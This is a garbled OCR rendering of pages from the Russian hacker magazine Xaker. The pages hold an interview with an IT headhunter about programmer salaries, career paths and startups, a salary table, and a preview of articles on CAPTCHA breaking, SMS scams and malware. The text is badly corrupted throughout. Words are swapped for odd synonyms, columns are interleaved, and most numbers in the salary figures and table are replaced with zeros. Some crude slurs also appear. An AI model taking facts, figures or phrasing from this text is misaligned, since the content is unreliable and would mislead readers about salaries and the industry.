вслед за зто расстреливали . Знание сего волшебного

телефона, сообразно сути, нисколько отнюдь не дает.

мист получай

Хантер естественным путем знает Но относительная технических

Буквально как-то у меня три дня отнюдь не работала

сnециалистов - семя неnублич-

чинающий , в такой мере на правах теперь сие

счел меня каким-то

ные. Рекрутеру ахти хоть в гроб ложись вплоть до ни х добраться, в силу того что в чем дело? они закрыты

того, равно как моя персона разместила объяв ление что до том, сколько

в середине комnаний. К nримеру, на мэрии

:1

В результате

работает

000

ление. Когда автор видим вакансию

к RuЬу-nрограммиста вслед

nрограмм истов, однако наравне

пания его отнюдь не найдет. Однако во обзорах

твоя милость прежде них достучишься? Как вытрясти душу

сотрудников, благодаря тому что что-нибудь автор сих строк отнюдь не успевали раз­

поперед того человека, что по сути дела сидит

бирать почту. Пи сьма падали такого типа лавиной,

равным образом кадит nочту отдельный день? Это nрактически

ась? сполна

невозможно.

си дел равно разбирал их неделю .

00 тысяч,

наш брат понимаем, что-то следовать такие монета ком­

пришлось спешно собирать дополнительных

PRUFFI

000 тысяч

самое востребованное наnрав­

страшным спамером . А вместе с л училось зто позже

автор ищем людей с целью Google.

никак не может

рублей, буде некто далеко не абсолютно на­

Бывают дни, рано или поздно у меня «сносят» почту.

Gmail

Ruby

значение мень ше

лишь публичных людей.

почта, поелику ась?

выше, нежели на анали ­

зарnлат аналитики учиты вают занижен­ ные зарплаты, во результате что итоговые

цифры получаются недостоверными .

ГДЕ РАБОТАТЬ?

Количествооткликовоченьзависитотсамой

Каждый системщик знает такого но второ­

вакансии. В среднем случается приблизительно

го . Он знает, зачем смотри этот- благой програм­

Если ваша сестра можете переться работатьврунет­

откликов, хотя перед ходит да прежде обвалов. Летом была

мер , а этот- <<сачок» равно околесица деять невыгодный будет.

ступайте на рунет! Ни сам в соответствии с себе директриса далеко не хорошенького понемножку круглым счетом

ваканция управляющего на венчурный фонд­

Мы открываем вас вакансии- рекомендуйте

развертываться , как бы рунет равным образом

пришло почти

своих друзей бери сии вакансии . Это работа,

000 откликов вслед за двум дня .

В среднем одну вакансию вает через

00-60

PRUFFI

00 000 впредь до 00 000 персона

но. То принимать автор издревле ранее СМИ.

просматри­

ежеднев­

:1

IT

на целом.

а любая занятие должна взяться оnлачена. Если

У крупных порталов издревле жуткая дефицит

возлюбленная сделана усnешно равным образом я устроили человека

людей, особенно технических сотрудников .

в соответствии с вашей рекомендации , автор сих строк вас заплатим. То вкушать давалец nеречислил нам гроши

Это богатые компании, да у них недостает ограничений

почитай << во этом году наша сестра воэьмем исключительно

вслед за хантинг. Мы , малограмотный раскрывая клиента, рассказали вас что до том, в чем дело? очищать такая

замечательная вакансия. Вы кого-то

00

чело­

век, равным образом отнюдь не больше!>>. Они берут многих равным образом заин­ тересованы изумительный всех, у кого лакомиться необходимый уровень комnетенции равно адекватность.

nорекомендовали и, неравно славно

Хантер отнюдь не является носителем

сделали свою работу, nолучили

какой-то супертайны равным образом су­

содержание

перэкспертизы. Что вплоть до нас

0000 евро.

Это

видимое дело нам сnраведливым.

представлял с лица серединный

Если ваш брат выбираете, нежели делать во рунете,

равным образом у вам примерно крошечку символический склад ума- учитесь программить. Даже разве позже

ваша милость никак не будете nрограммировать, важность пре­

хантер? Очень д орогой

Раньше после рекомендации

дакта [Pгoduct Manageг'al, что во прошлом

костюм, суперджип- во се бери расхититель оты.

ни одна собака безграмотный платил. Н насчёт на результате нашего

Он приезжал, выкладывал ай пади к,

подхода насчёт гр омный величина данных оспе­

центов получи

айфончик равным образом вновь

циалистах, касательно профессионалах , вышел

достигнуть договоренности не без; nрограммистами. Наnрим ер,

открыто .

мы неграмотный смогу вместе с ними договориться- первый встречный

05

молескинчикав

да говорил клиенту: <<Мои услу ги стоят

Мы заявили, сколько дерьмовый <<офигенной

00.

Почем у? Пот ому, почто вам сможете

nрограммер меня обманет.

три оклада кандидата, благодаря чего что-то ваш покорный слуга об­

ладаю офигенной эксnертизой».

сие умел, бросьте много выше- nро­

:1

Он скажет: <<это

РRUFFiпервойсталауказыватьзарпла­

невозможно» alias <<чтобы сие сделать, нужно

твоя милость на топовом сегменте рунета. То очищать

неудовлетворительно лета >> [хотя на реале- три дня), да ваш покорный слуга ему nо­

буквально: <<Э та должность от т оит рублей во месяц. Эта есть смысл

эксперты нате рынке- всегда вы. Для сего автор сих строк

Через нас человеки узнали относительно величине компенса­

nридумали присовокупление интересах социальных сетей

ций вице-nреэидентов nорталов: из чего можно заключить nонят­

Рунет до второго пришествия был закрытой системой, идеже

PRUFFI Fгiends [apps.facebook.com/pгuffi

но, сколько тоn-менеджеры nолучают ото

вершиной карьеры была занятие во Яндексе . То

03/158/201 0

рублеЙ >>.

верю. Если ваша сестра разбираетесь на коде, вы хорошенького понемножку

экспертизы» невыгодный существует. На самом деле

ХАКЕР

000 тысяч

000 тысяч

000

тысяч

несравнимо легче. И вашей команде тоже.

031


.. COVERSTORY есть твоя милость шел-шел, равно становилось ясно: во конце

Смотрите получи подсолнечная не без; точки зрения «мобиль­

отлично касательно зарплатах ото

концов тебе нужно начаться во Яндекс, вчинить

ности». Доступ ко интернету из компьютера

понятно- куда большая фазис ответствен­

немного погодя работать- равно к тебя сие хорэ санаторий.

уходит во прошлое. Он, конечно, равно ниже хорошенького понемножку

ности. У нас были такие требования ото банков, ко ­

Яндекс был чем-то что-то Олимпа! Боги всегда

прилагаться ради посещения интернет­

торые проходили, видимо, в области верхней границе

сидели на Яндексе. Они то есть не без; таким рас­

ресурсов, да пока что год-два, да умная машина

четом строили частный НR-бренд: однако сии гамаки,

перестанет присутствовать основным устройством

бесплатная подача да оставшиеся бонусы. В коридорах

на этого. Такими устройствами ста-

со временем можно' столкнуться Илью Сегаловича . При­

новятся мобильные да планшетники.

глашение делать во Яндексе было равносиль­

Почему сие важнецки не без; точки зрения

да тому, ась? ко тебе спустился Зеве равным образом погладил

карьеры? Потому, ась? програм-

тебя сообразно голове.

:1

И во Яндексе точно

диапазона

000 000

рублей да повыше . Это

-180-200 тысяч

рублей . Порталы

предлагали меньше- этак

000-120

тысяч . Бывали требования равным образом через системных интеграторов, с годами так где-то

040

тысяч . Это цены в области Москве.

мисты, да продакт-менеджеры,

недурно . Но сие давнёшенько неграмотный единственная воз­

да всё, что такое? ноне делается с целью

можная конечная пятнышко карьеры.

мобильных платформ Andгoid, SymЬian,

КАРЬЕРА ПРОГРАММИСТА Сегодня самое красота

liOS, Windows

-быть программ истом.

Перестаньте варить во рамках рунета. Интер­

Phonel,- всё востребован но. И хорошенького понемножку

Вы понимаете азы бизнеса, начала

недостает стал международным. В Россию пришли

востребован но. Зарплаты растут объединение по всем статьям

профессии, вы полегче лишь взвевать

всегда ведущие компании, а кто именно неграмотный пришел, оный

направлениям.

равно растить. Ведь бизнес- возлюбленный неграмотный относительно сер­

придет во изм года. Мы искали сотрудников

вера. В основе нашего бизнеса лежит код.

ради русского

Интернетстановитсявсёболеесегмен­

Это да принимать платформа. Поэтому, кабы вас

для того

тированным. Раньше вам могли конструировать

умеете программить, ваша поприще довольно

Facebook равным образом Google, наша сестра искали Fouгsquaгe, в целях Linkedln да многих других

компаний. Неважно, придет ли братия сама,

карьеру следующим образом: теперича ваш покорный слуга

формироваться настолько, в какой степени ваша милость за­

во вкусе

РМ

хотите вырастать да как этому помешает

Linkedln,

не в таком случае — не то купит какую-то другую ком­

IProduct manageri, будущие времена занимаюсь

панию, в духе сие есть Gгoupon. Прис утствие

маркетин гом , послезавтра- в который раз РМ,

будет! Поэтому возьми глаза в зубы получи и распишись круг шире, возьми глаза в зубы

тогда не вдаваясь в подробности первостепенный редактор. Сей-

личная жизнь.

получай мировые тренды- сие поможет тебе равно во

час, ко сожалению либо — либо ко счастью, всё чище

У программиста бог не обидел путей развития.

карьере во волюм числе.

надо узкая специализация. Тот но марке­

Первый- вам можете всю общежитие горячо код.

тинг начинает разграничиваться бери кучу направлений:

В таком случае вам сперва становитесь nро­

Я малограмотный считаю, почто дьявол разделен сверху нашу Пре­

вона трафик, вишь контент, во брендинг равным образом эдак

грамм истом, следом руководителем группы, по­

красную Страну равным образом поголовно другой ад. Уверена,

далее. Надо выкроить одно направление: коли

томище руководите разработкой крупного портала.

который человеку надлежит бытийствовать пожалуйста мучиться

пятерка парение обратно вас могли бы ровно nерейти

Это ежели вас безграмотный хотите останавливаться. Или

равно небезынтересно расти, ась? возлюбленный своевольно мочь подбирать .

изо сегмента брендинга во сегмент, связанн ый

дальнейший вариант- сперва ваша сестра работаете про­

Зарплаты !именно на интернет-сектореl у нас

не без; трафиком, ведь пока сие хорош конец

граммистом, а следом РМ'ом технологического

безотлагательно сравнимые, а чаще даже если выше, нежели

сложно.

nроекта. Затем делаете частный стартап или, разве

сверху Западе. Если человеку неотложно забавно по­ работать во центре игровой индустрии во

Zynga-

сие технологическое линия вообще Винтернет nришло бездна безвыгодный интернет­

сие понятно, да сие его выбор. И разве симпатия уезжает

ных компаний. Например, МТС со

соответственно приглашению

<<Связной» со

Zynga,

в такой мере во вкусе команда на этом месте

Enter.ru

Omlet.ru,

да т. д.- их бог много.

выделяется на разобщенный дельце присутствие портале, руководите уж целым направлением. Класси­ ческий пример- Леша Терехов. Его ваш покорный слуга нашла,

безграмотный работает,- сие равным образом его предпочтение .

Они заинтересованы на привлечении

Не вижу после этого никакого предательства.

большого количества людей . Денег

риант- вам можете жуть протяжно расти, а nотом

у них равно как много, они хоть могут вы­

начинать действительно евангелистом какого-либо

делять внутренние стартапы.

наnравления, равно как Гриша Бакунов на Яндексе.

PRUFFI

открыла стартапы как бы точку

развития. Но стартапы в свой черед нужно

если спирт был во маленьком стартапе. Третий ва­

Ну да конечно, ваш брат можете присутствовать программистом,

разделять. С точки зрения найма

Не бойтесь уходить учиться объединение хоро­

надвинуться во технологическую компанию равным образом достичь

наша сестра выделяем двум категории стар­

шим, интересным зарубежным про­

вплоть до ее гендиректора.

тапов: не без; инвестициями до самого $500 000 и сильнее $500 000. Но сие всего только единолично

граммам. Вы век сможете вернуться,

да во качестве классического примера тогда

когда захотите. Но вернетесь больше

допускается nривести Дмитрия Гришина, некоторый

изо критериев. Очень мирово вдолбить

востребованными. Более того, смо­

начинал во

молодому человеку, некоторый далеко не денно и нощно

жете, скорехонько всего, взмести с годами денег

генерального директора

самовластно здорово сие понимает, почто неграмотный нужно

равно вернуться сейчас далеко не во статусе наемно-

двигаться на плохую компанию: со временем его об­

го работника, а на статусе создателя

манут, ничему безвыгодный научат

бизнеса. Классический

равно суммарно короче стресс,

nример-СергейФаге

подземное царство равно всё плохо.

равно его

Ostrovok.ru.

Таких

примеров хватит много.

Шансов немедленно много! Ты можешь подбирать направления для развития. То есть, условно говоря, когда тебя никак не взяли во Яндекс

По сравнению вместе с объемами с информационной безопасно­

-это безграмотный ликвидация света . Если не долго думая

стью, незначительна да несерьезна.

тебе подмывает делать объединение найму, так

Спрос возьми специалистов, эанимающих­

дальше, возможно, захочется отворить

свое мастерство lи кабы сие хорэ интернет/IТ, мы, вторично же, nоможем!. Потом, ежели стартап

Molotok.ru,

ся информационной безопасностью, крайне мал. Но то, почто дьявол растет,- факт.

Это четвертый вариант,

а в ту же минуту занимает шутцпункт

Mail.ru.

ПРО ТРЕНДЫ Нынешние тренды таковы:

0. Ruby- из-за

путина востребованность програм­

мистов выросла для

побольше нежели на общего бизнеса ниша, связанная

:1

0.

06 %,

а зарплаты поднялись

00 %.

Всё, ась? связано не без; мобильными платформа­

ми,- равно разработка, да маркетинг.

0. 4.

Весь геймдев. Всё, в чем дело? связано со

e-commerce,-

умереть и невыгодный встать с­

требованность да зарплаты ради крайний год выросли сильнее нежели в

00% . Это

курс

особенно востребован но.

Особенность зарождающегося тренда со­

короче удачным, ты, возможно, продашь дельце

имеет смысл на том, в чем дело? вилочка зарплат слишком

равно вернешься ко работе по части найму, а еще абсолютно

велика: собрание может варьироваться ото весть

заговор

возьми другом уровне . Мы показываем «объемную

короткий давно всерьёз крупной. Когда

мобильные да планшетные устройства начинают

картинку», а пользу кого многих людей сие куда имеет принципиальное значение .

приходят подобные требования иэ банков, предложение

всё активнее прилагаться чтобы доступа ко ин-

032

Наблюдается острая напряг разработчи­

iOS

равным образом Andгoid. Бизнес почувствовал, что такое?

ХАКЕР

03/158/2012


Интервью со ведущим хедхантером рунета

тернету возмещение стационарных компьютеров .

ни засада на Москву и, для примеру, возмещать

да скажут: <<Вот тебе порция на компании равно не­

Отрасль оказалась для этому невыгодный готова ни во плане

извод получи и распишись съем жилья, а не велено сказать, что-то

сколь миллиардов, шагом марш делай настоящий

количества, ни во плане качества специалистов.

сие массовое явление. Однако такие случаи

НR-дивизион>> , моя персона что, откажусь? Нет. Нужно

Результат- колкий развертывание востребованности

учащаются.

пиндос мамка , зачем шар земной теперь пленение шансов. Шанс

В все в равной степени кто немалый компании постоянно убирать люди,

составлять активным, в надежде увеличить возможность

Уменьшается репутация РНР-шников

которые поуже переросли поверхность работы

этого. Хотя бы править благ.

да Регl-программистов. Если ваша сестра занимаетесь

объединение найму. Это ценные сотрудники: от ними всё

равным образом зарплат мобильных разработчиков.

может точно во произвольный день, равно куда хоть куда

Регl, вероятно, вы нужно подумать, для какой­

хорошо, а откинуть их на наемных сотрудниках

В случае вместе с блогом не фунт изюма пиндос мать, аюшки? симпатия

в таком случае чесалка переходить. Скорее всего, держи

поуже невмоготу . Не помогут никакие задачи

может потеть над чем наравне для тебя, приближенно да против.

в духе задним числом Регl переключиться в «Рельсы>> проще,

да никакая зарплата, потому они хотят что­

Не приходится писать: << Я рассудительный да всё знаю , а ваша милость уны­

нежели держи С++ или — или

так свое. Димаша Гришин с Mail.гu решил:

Ruby,

приближенно

Java .

лое говно! >> Нет! Благ может кормить ажно

автор сих строк сделаем разобщенный инкубаторий ради таких Интернет-сам согласно себя тренд. Весь . Всё раз­

людей, дадим им оплачивание равным образом не­

летается наравне горячие пирожки .

обходимую инфраструктуру, так чтобы они

адски жесткую критику, однако лишь конкрет­

ную равно обоснованную. Например, можно написать что-нибудь видать <<этот интер­ фейс искажённый в силу того что да потому,

могли ударяться своими проекта-

ми . Если у людей во конечном счете

ПРО ПЕЧЕНЬКИ

а строгий повинен выглядеть так>> . Если подле этом призвать

ни аза безвыгодный получается, им по новой

Помимо конкурентной зарплаты равным образом интересной

предлагают работу в соответствии с найму. Если

работы, всё чаще предлагают сговорчивый график.

но получается, Mail.гu Gгoup вдоволь

Это значит, зачем у тебя вкушать некоторое количе­

могает подняться в воздух этому проекту

ство <<присутственных дней>>, вслед которое твоя милость

максимально высоко. Компа-

потребно отбарабанить определенное состав

ния дает многое, забирает

часов во офисе. Это важно, сие командная рабо­

вовсе небольшую долю

та- твоя милость приходится вместе с кем-то беседовать равным образом в такой мере далее.

да позволяет людям

принадлежащий вариант, в таком случае полноте вообще идеально. Вы должны показы­

вать себя профессионалом. Возможно, проект, который вы только лишь что такое? критиковали, вас равным образом позовет.

Всё остальное пора твоя милость можешь трудиться идеже

свершать бог знает что свое. Одним изо таких про­

Я самочки кончено беда сколько равно то и дело хантила

хочешь. У тебя попросту глотать задача, которую твоя милость

ектов неотложно является стервис микро­

сверху технических конференциях. Я

обязан выполнять.

блогов Futubгa lfutubгa.com].

немного зачем понимаю после получи технической секции, хотя вижу мальчиков от горящи­

Компании немедленно счета учат равно отправляют на интересные стажировки. Раньше такого

ми глазами, задающих правильные

О ПОИСКЕ РАБОТЫ

вопросы. Докладывает, для примеру,

суммарно неграмотный было: чуть-чуть кто именно был заинтересован

Если особа ищет работу, ваш покорнейший слуга сове­

Игорёк Сысоев, а мальчугашка изо зала за­

на системном обучении своих людей. Сейчас а

тую рассредоточивать конспект везде. Хуже

дает ему прямо классический вопрос- я к нему подхожу, даю светофон равным образом зову

компании однако чаще стали возбуждать зару­

отнюдь не будет. Поиск работы- сие та но

бежных технологических учитель к внутренних

самая работа. К ней целесообразно адресоваться

для нам для тестирование. Даже когда

выступлений . Это ужас сверхценно равным образом важно.

ответственно.

автор малограмотный по конца понимаю самолично вопрос,

На внешней конференции блестящий разработ­

Не ленись сочинять во компании на­

чик чаще общем закрыт

прямую. Составь роспись компаний ,

соответственно реакции докладчика ваш покорнейший слуга вижу, аюшки? дьявол

NDA (Non-disclosuгe

правильный.

agгeement- Соглашение что до неразглашении).

которые тебе интересны. Не нужно распространять

Все более-менее приличные зарплаты, равно как

Он просто-напросто неграмотный имеет полномочия задавать многие

по всем статьям стандартное письмо. Напиши , вследствие чего

правило, закрыты определением «цена дого­

вопросы. Все я возьми конференциях выглядим

твоя милость хочешь нести протоколы и заботы не кто иной на этой компании .

ворная». Есть причина- с целью них существует

в качестве кого дураки: околесица ценного проговорить никак не можем,

Например: << Я хочу во Островок.ру, благодаря чего что-нибудь

вилка. То снедать у

в силу того что ась? сие может расстроить нашему бизне­

считаю данный стартап ужас перспективным,

утнапиштим установки <<мы нанимаем чувака после

су. Поэтому автор сих строк говорим какие-то банальности.

ми нравится, по образу формируется его команда.

тысяч рублеЙ >>. Поэтому они решают: а давайте

HR

на таком случае перевелся конкрет­

00

Когда такого наставник привозят на компанию, разра­

Вообще , ми интересна туристическая тема,

погляжу чуваков во диапазоне с

ботчикам спокойнее- ни один человек ни аза никак не укра­

да ваш покорнейший слуга люблю программировать получай

тысяч. Если авторитет довольно куда благоустроенный

дет. Они могут удобно говорить, дебатировать

нее всего, тебя позовут поговорить.

Ruby >>. Вероят­

-заплатим ему

тим

· какие-то сложные задачи .

Если твоя милость напишешь на

00.

050,

00

предварительно

020

разве безграмотный очень-запла­

Вот во этой вилке они свободны.

00-15 компаний, в таком случае 0-4

Стартапы пришли от модой приглашать опцио­

пригласят держи собеседование. Найти адреса

ны. Раньше заразиться условия было архи слож­

капли примитивно : они убирать в сайте компаний.

HR СОВЕ ТЫСТУДЕНТАМ Еще порядком планирование отступать считалось, что-нибудь

а равным образом престижно. Их давали Яндекс, Mail.гu, и возьми этом, наверное, дозволительно подвести черту список.

Принцип «я продаюсь единожды на три года» поуже

К сожалению, не долго думая получай торжище входят стар­

далеко не актуален. Мы продаемся всё время, ты да я всегда

Но если бы твоя милость учишься во Бауманке равно nри этом ра­

тапы почасту от некоторым непониманием. Одно

-товар. Если будущие времена ко ми придут изо

ботаешь на Макдональдсе-это плохо. Не могу

Google

зубрить да нести записки и заботы одновременно- хорошо.

дело, буде твоя милость десяток планирование работал на Яндексе и получил один оп циан, равно другое- три меся­ ца нечто покодил на Островке равно равным образом получил

оп циан. Мне кажется, сие неправильно. Оп ци­ ан принуждён бытовать архи ценной вещью, иначе и нарицательная стоимость самой компании некогда падает. Большое число компаний теперь ищут сотрудников на регионах. Ищут на правах для того фи­ лиалов, где-то да прямо ради удаленной работы. Иногда компании готовы переправить сотруд-

ХАКЕР

03/158/ 0012

СЕГОДНЯ САМОЕ ПРЕКРАСНОЕ- БЫТЬ ПРОГРАММ ИСТОМ.

Bbl ПОНИМАЕТЕ ОСНОВЫ

БИЗНЕСА,ОСНОВЫПРОФЕССИИ,ВАСЛЕГЧЕ ВСЕГО ПОДНИМАТЬ И РАСТИТЬ 033


COVERSTORY сказать, зачем ваш покорный слуга зто осуждаю, все же ситуации

ший не без; тартап. Хороший безграмотный во плане успешности

П отому, что-нибудь лю д да н е предста на ляю т, каков

у людей бывают разные, равно подчас сие нетрудно

не без; точки зрения бизнеса - потенциального

для самом д медленно интернет. Они малограмотный пре д ставляют,

вопросительный знак выживания.

работодателя сие немножко интересует. Крупным

что-то в самом д на честном слове нужно, а тоже никак не со ­

размеряют собственные силы да из р едс т ва.

компаниям куда как превыше испить во вы

Работать кайфовый пора учебы здорово хорошо бы

человека, какой мыслит во правильном

н е про денег, а для того выбора т ого, нежели зани ­

направлении равно умеет подольщаться руками.

м а т ьс ваш покорный слуга во ~удущем . Это отличное время, с тем

Порталам нужно всё, что такое? связано

выработаться из направлением дальнейшей

со техноло г иями, видео, мобильны-

Н е хва т ает по части п ыта, св пишущий эти строки зей, те рп е н ия, денег равным образом общем п ро ч е г о. Д е л ай т е стар тап , пока учитесь,- да мы из тобой на акробат воздуха заметим.

ми платформами, социальными

деятельности.

Идите нести протоколы и заботы на большую, серьезную компанию, идеже вам

сетями, - сие основные вещи,

Д алеко невыгодный безвыездно от первого раза нащупывают,

которые востребованы завсегда

зачем несмотря на то т. Е сли, суще студентом, твоя милость меня­

равно всеми.

научат качественному про­ граммингу, качественному

маркетингу. В ы пр осто

ешь работу присест во три месяца- сие безвыгодный страшно. Ты шестым чувством нащуnываешь, что хочешь . Что

Че м может составлять любо-дорого глядеть

самое важное : ко последнему курсу твоя милость должен,

первы й стартап? П ока

поработав на разных местах да пройдя стажи­

ваша милость учитесь, возьмите хоть , на Бауманке, вам

неграмотный вместе с н изу. Вы постойте т е с того же Ян д екса, M ail.гu, изо какой-либо следовать п а д­

посмо т рите наинтер н ет не вз гля д ом стыд ента,

ровку во разных компаниях, определиться, кем

вещь делаете, ваша сестра пробуете. Вы смо­

твоя милость хочешь бы т ь. Услов н что до говоря, «маркетинг

трите равно понимаете, который вы интересно,

утнапиштим компа н ии, в таком случае сделал ть све р ху. Пл законник ваш брат

-не мое, верстка- далеко не мое, а смотри подготовка

набиваете первые ши ш ки.

обрастете связями, во е д ь л юбой п насчёт р та л

дает аспидски хорошую на озможность об ­

-да!>>. Вот сие хорэ хорошо. Не н адо по части г ромного количества тусовок

умножаться связями.

К по отношению для ончанию учебы с гонором умножить свою

небось стартаперски х. Люди с годами безвыгодный ра­

те х ничес ко ую компетенцию . Или, продукто­

ботают, они ходят да трындят ни что касается нежели .

У вы будут связи, у вы хорошенького понемножку по­

вую, неравно твоя милость РМ, alias маркетин г овую, разве

Ц енность таких людей нулевая.

нимание, ваша милость обрастете костяком

Меня пугают люди, которые во

друг, автор из ним пивцо число «пи» л >>. Б пенис е т д ругое:

команды. Н е достаточно во что касается т э т относительно г о: «Э т в отношении моего

специализируешься получи и распишись маркети н ге.

09 парение

Ес л ич еловекправильнодумаетии м еет

заявляют: «Я спецушник сообразно формиро­

<<Это офигенный программ ис т, пишущий эти строки не без; ним

бэкграунд , унее г овс~получится .Затакими

ванию бренда!>>

работал во одном отд еле, да мы вместе с тобой сош л ись

от ним получай общей теме, да нам увлекательно

людьми гоняются крупные порталы да старта­

пы, набирающие обороты, - все!

общаться>>. У вы поя на ится какое-то коли­

О СТАРТАПАХ

игра т в вместе с на об дн ых дене г- текущий ч летчик во р у н е т е

Н е ст оит по отношению вместе с обенно ра из от ч ит ы вать держи стажиров­

Большинство стартаповна рынке- унылое

недурственно зарабаты во ают. Вам если т лег ч е около ­

для у во большо й компании. Все порталы пред­

г ов н в рассуждении . Именно отчего у нас крат на полгода вы­

нять инвестиции, разве ваш брат скажете: << Я три го д а

лагают стажировки, только держи деле безвыгодный архи

ходит показатель

«30 лучших

команд стар­

любят овладевать стажеров, таково в качестве кого от ними

тапав Рунета>>. Зачем автор его выпускаем?

кушать видишь экий проекп>. Вам, ско р ее , д аду т сии

программ да л почту на Я н дексе, а пока что у меня

надо биться равным образом назначать

Затем, что такое? неотложно беда бессчётно «nены>>,

деньги, оттого почто у во штукарь сделал т ь невесть какой п касательно дт на е р ж ­

с целью них лишенный пролетарий ден ь , зачем всего ничего

во всяком случае рыночек всего только развивается. И весть

д енный относительно п ыт равным образом вы, веро ятн о, д ейс твит е л ь н что до

кого устраивает .

имеет принципиальное значение вбить молодому человеку, ко­

отчего-то из д елае т е.

торый далеко не ввек самопроизвольно важнецки сие понимает,

У большинства порталов неотложно от у ще­

что-то отнюдь не нужно двигаться во плохую компанию :

Я считаю, в чем дело? близкие стартапы нужно создавать по­

со твуют школы да у ч енические програ м ­

вслед за тем обманут, ничему невыгодный научат да по отношению ко всему

сле

м ы . Например, у Яндекса кушать Школа

короче «стресс, пекло равно всё плохо>> .

анализа данных. Если неплохо пройдешь отучишься, тебе из большущий ве­

ста р тапы. Хотя нет, безграмотный так. Д е­

роятностью предложат работу.

лайте стартапы, же безграмотный связывай ­ те не без; ними свою основную карьеру.

Фактиче от ки ни у кого, который начи н ал

вместе с ебянаолимпиа д а х попрогра м ми­

Google- тама

сделал т ь специальные

подразделения ради студентов . Если твоя милость

мирово себя показал, тебе разом а сделают предложение.

Мало компаний следовать сие берется. У н мастер своего дела глотать р яд программ, на книжка числе платная п ро г рамма

со льготными расценками интересах стартапо во . Е сть и бесплатная, всем миром со Gгeenfield Pгoject. Мы всё в равной степени изначально оце н равно на аем, насколь ­

Можно что до ч ень здорово обнаружить

Mail.гu,

заранее поработав.

Мы ужас зачастую ищем людей чтобы стартапов. Скажу страшное- никак не делайте

такую программу равно мирово

рованию . Они проводятся во Яндексе,

08-29 лет,

не без; вою карьеру со стартапов, ни аза

н е полу ч илось . Нужно существовать гением уров ­ ня Цукерберга, только тут да никакие распорядок

ко старта п живучий. Е сли стар т ап порядок л ь­ ный, однако у него все еще п рос так н е т д е н ег, ч т об ы получи и распишись м платить, ты да я пиарим вакансию из-за контокоррент своих

возможнос т ей.

к вы не насчет частностей невыгодный действуют. Спасибо, почто

ваша сестра несложно есть!

:1

Стартапы получай высевной стадии- сие умереть и далеко не встать многом дело хантеров. Потому что-нибудь угроза получи и распишись этапе реа­

Ст удент, ко а для н равным образом странно, мо жет выработать хоро -

Почему неграмотный п олучаю т ся первые стартапы?

лизации идеи минимален .

Главный падди для завсегда связан от командой. Сделают сии человек чтение либо нет, смогут сиречь

ДАЛЕКО НЕ ВСЕ С ПЕРВОГО РАЗА НАЩУПЫВАЮТ, ЧЕГО ХОТЯТ. ЕСЛИ, БУДУЧИ

СТУДЕНТОМ, ТЫ МЕНЯЕШЬ РАБОТУ РАЗ В ТРИ МЕСЯЦА- ЭТО НЕ СТРАШНО.

далеко не смогут? Оценить всё сие сверху старте, хеджи­ ровать сии риски очень на ажно. П оэ т ому, когд а старта п ы шимоза ь ко получи и распишись ч или зарож д атьс пишущий эти строки ,

агентство

PRUFF I было

п ер во ым, кто именно п в отношении ш ел

инвентаризировать всё сие со точки зрения л ю д ей. М ы очень счета сделали во этом смыс л е, поэтому,

конечно, нам было занятно одолеть старта ­ пы изнутри. :К:

ХАКЕР

03/158/2012


Зарплаты специалистов [1 сентября-1 декабря 0011 года] РАЗРАБОТЧИКИ Профессия \опыт работы

0-5 пет

0-10 пет

бопее10 пет

00 000- 00 000

00 000- 050 000

070 000 - 050 000

050 000 - ...

00 000- 00 000.

00 000- 080 000 .

080 000- 050 000.

050 000 - ...•

0-5 пет

0-10 пет

бопее10 пет

00 000 - 00 000

00 000 - 00 000

00 000 - 000 000

000 000 - ...

Unix,Linux admin

00 000 - 00 000 20 000 - 00 000 •

00 000 - 00 000 60 000 - 00 000 •

00 000- 010 000 90 00 0 - 010 000 .

010000- ••• 130 000 - 050 000 .

DBA (Огасlе, MySql, Postgгes равным образом

'о ооо

- 00 ооо 40 000 - 00 000 •

00 000 - 030 000 80 000 - 030 000.

030 000- 050 000 130 000 - 050 000 .

050 000- 080 000 150 000 - 080 000 *

Team

leadeг

0-3

лета

Разработчик подина ппатформы Andгoid,

iOS

Разработчик Регi/РНР

Разработчик

Ruby on Rails

СИСТЕМНЫЕ АДМИНИСТРАТОРЫ Профессия \опыт работы Ведущий

Windows

0-3

лета

распорядитель

т.д.) Руководитепь группы системных администраторов

GAME

00 000- 050 000

050 000- 080 000

080 000- 050 000

00 000- 050 000.

050 000- 080 000 .

080 000- 050 000 .

0-5 пет

0-10 пет

бопее10 пет

ИНДУСТРИЯ

Профессия

0 исследование работы

0-3

годы

Неб-разработчик

Flаsh-разработчик

Game

ргоduсег

ЦВЕТ

-

востребованность осталась для прежнемуровне

востребованность увеличилась не так нежели получи и распишись 00 %

востребованность увеличилась побольше нежели сверху 00 %

востребованность уменьшилась поменьше нежели сверху 00 %

ХАКЕР 03/158/2012

• Заработная плата прошлого квартала

035


Preview

03 страницы журнала бери одной

полосе.

Тизер некоторых статей .

PCZONE 38

ВКИТАЙЗАПОКУПКАМИ? tотни тысяч товаров согласно самым низким ценам - идеже сызнова твоя милость найдешь такое

предложение, неравно безграмотный на китайских интернет-магазинах? Такого не имеется даже наеВау!Близостькпроизводствуи огромная соперничество играют получи и распишись руку

покупателям. Из Китая не грех вслед казать самого ряд равно объединение самой низкой цене. При этом тебе никак не нужно морочиться с оплатой доставки - до сей времени изо д ержки берет на себя продаве ц . Мы подготовили длятебяобэорпровере н ныхторговых площадок, гд е приобести интересую­ щий левак твоя милость можешь со минимальным

риском. Обсудим я да важные советы по он лайн - пок у п ка м из уче томище специфики поставщиков с Поднебесной.

хакинг

PCZONE

ПРОВЕРКА НА ПРОЧНОСТЬ

ФРЕЙМВОРКДЛЯХАКЕРА

0CANCRACKIT!

Наша задача-автоматизированно

Анализ структуры сайта, брутфорс форм,

Управлениеправительственнойсвязи

хлопнуть САРТС Н А. Как сие выработать помимо

разыскание уязвимостей, подчинение дырок,

Великобританиинедавноопубликовало

реализации фильтров, слож н ых нейрон­

огибание 005 - всего лишь малая порция того, н а который

задачки с целью хакеров. Мы решили их по­

ных сетей равным образом ОСR-систем?

способны плагины проектаwЗаf.

впериться равным образом артельно решили.

взламывание

ФАЛЬШИВЫЕ СМ(

Партерка-при м ин ка-подписка- взгляд изнутри насчёт том, на правах устроены да получай нежели

зарабатывают многочисленные СМС­ лохотроны.

036

MALWARE

ВЕСЕЛАЯ ТРОЙКАБУТКИТОВ Самыетехнологичныеугрозы

0011

возраст на

веселых картинках. Кто изо разработчиков малвари инструмент ивил антивирусных аналити­

засада в большинстве случаев всего?

МАЛВАРЬДЛЯ МОБИЛЬНЫХ ОКОШЕК Вирусовдля

Windows Phone 0.5 временно

нет. Но появятся ли они во будущем?

Разбираемся вот внутренностях новой мобильной ОС через Microsoft.

ХАКЕР

